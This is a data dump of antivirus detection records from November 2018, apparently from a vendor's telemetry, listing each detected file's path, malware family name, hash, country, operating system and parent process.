  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T22:13:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062622-2fd59df2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062622-2FD59DF2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052659-e3f39c3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052659-E3F39C3A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050636-0b4c71b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050636-0B4C71B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060937-d92fc37c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060937-D92FC37C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060713-830d6d39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060713-830D6D39', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054456-65f40869', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054456-65F40869', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060759-9e968603', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060759-9E968603', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052600-c12f1664', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052600-C12F1664', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060733-8eccb939', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060733-8ECCB939', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053729-5ba72992', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053729-5BA72992', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050812-4492128f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050812-4492128F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053737-6075b4de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053737-6075B4DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:33:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054814-dc61370d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054814-DC61370D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051149-c5fd2d4e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051149-C5FD2D4E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062251-b242c9a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062251-B242C9A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055708-1a331ee0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055708-1A331EE0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060654-77e2332d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060654-77E2332D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='birforms.exe', filepath='C:\\eBIRForms\\BIRForms.exe', filesize=30912000, name='W32/Sality.AT.#M1.#R1'), hash='1511090e5bb6ca6135675bf11411b7453f8934ab98e89eeab987cee50e479829', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:25:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:50:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155129-9438ee0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155129-9438EE0C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154522-56446db5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154522-56446DB5', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:45:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7096569\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/SL5=\\\\\\"$703DC,11849392,56832,C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\CheatEngine67.exe\\\\\\" \\\\\\/SPAWNWND=$803E2 \\\\\\/NOTIFYWND=$903B8 ', country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\is-STNMA.tmp\\CheatEngine67.tmp', parentsize=723552, timestamp='2018-11-01T05:46:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\autorun.exe', filesize=128000, name='TR/Dropper.Gen.#M300.#R3873'), hash='142187f2e53e6133e1a3f15c7e58f6758acb4f1864ade910537345f06c33b7e3', metadata=Row(cmdline='SCODEF:6348 CREDAT:78849 \\\\\\/prefetch:2', country='BE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=770608, timestamp='2018-11-01T11:20:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-090328-74b054b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a3d18d1e\\AVSCAN-20181101-090226-693FEA15\\AVSCAN-20181101-090328-74B054B5', filesize=64000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='15355493e7e02379ffb11d0a9bc01e27aa09d678d43f5e9d2daf14fc6937334c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:02:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='frxclient.exe', filepath='D:\\FRx 6.7\\Bin\\FRxReporter\\MS\\frxclient\\FRxClient.exe', filesize=128000, name='W32/Infector.Gen.#M300.#R7863'), hash='43b7394e9055872e5c011e629031f193e1a991f7dfea92d23dfb746debb44fd6', metadata=Row(cmdline=None, country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\TeamViewer\\TeamViewer.exe', parentsize=19495152, timestamp='2018-11-01T04:05:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180640-7da1bdc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_170ae493\\AVSCAN-20181101-180415-636910FF\\AVSCAN-20181101-180640-7DA1BDC9', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:06:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-08-23.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T13:18:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105622-2c1b5217', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105505-1E1C34B1\\AVSCAN-20181101-105622-2C1B5217', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rdaintd', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RDAINTD', filesize=64000, name='W97M/Agent.2975818.#M1.#R1'), hash='0d941b5226c82804d490653cb4464e1b60b6439e7e0a901fcc563ec1437f17be', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:16:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T13:43:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='documentos diversos .scr', filepath='C:\\Users\\X\\Desktop\\Documentos diversos .scr', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:15:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:31:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-08-23.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T14:18:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:39:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2f4156f6dc2dd147b7273406deb8d9ad7f466e70f84807ad6f8d50595f3efe43.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-16.available\\Avira\\2F4156F6DC2DD147B7273406DEB8D9AD7F466E70F84807AD6F8D50595F3EFE43.VIR', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='2f4156f6dc2dd147b7273406deb8d9ad7f466e70f84807ad6f8d50595f3efe43', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:53:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='escritura de revogação .scr', filepath='C:\\Users\\X\\Desktop\\escritura de revogação .scr', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:46:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160154-fd641796', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160154-FD641796', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mei.pif', filepath='D:\\DATA_SHARE\\LPA\\mei\\mei.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='need for speed the run.exe', filepath='C:\\Program Files (x86)\\Need For Speed The Run\\Need For Speed The Run.exe', filesize=7808000, name='W32/Virut.Gen.#M1.#R1'), hash='6b29dfb7c7c4dfe2919e997510c9d39000b5c56ec90113d7067ffecba1619c65', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T17:37:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111644-262d3172', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111644-262D3172', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:16:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e76e031a55cbe3de5318a993e74a17ed3a58e2140218b066b6a2fe637d7074e6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\E76E031A55CBE3DE5318A993E74A17ED3A58E2140218B066B6A2FE637D7074E6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e76e031a55cbe3de5318a993e74a17ed3a58e2140218b066b6a2fe637d7074e6', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:19:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='61a433746d3cf7ffafc4a1e06d48c2b686823e142145d7b01a7163123d9e8bd5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:51:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:23:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7cfb778aae830ce9b4b472a0011dbf5d232d49c8b6dca586593e248b887c8f02', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.categorizing\\7CFB778AAE830CE9B4B472A0011DBF5D232D49C8B6DCA586593E248B887C8F02', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='7cfb778aae830ce9b4b472a0011dbf5d232d49c8b6dca586593e248b887c8f02', metadata=Row(cmdline='-r', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T16:29:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184807-2b7c8347', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a201de49\\AVSCAN-20181101-184757-29CD9E5F\\AVSCAN-20181101-184807-2B7C8347', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:48:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:21:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122935-12c279a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122912-FF88AF9E\\AVSCAN-20181101-122935-12C279A0', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:29:35Z'), dt=datetime.date(2018, 11, 1)),
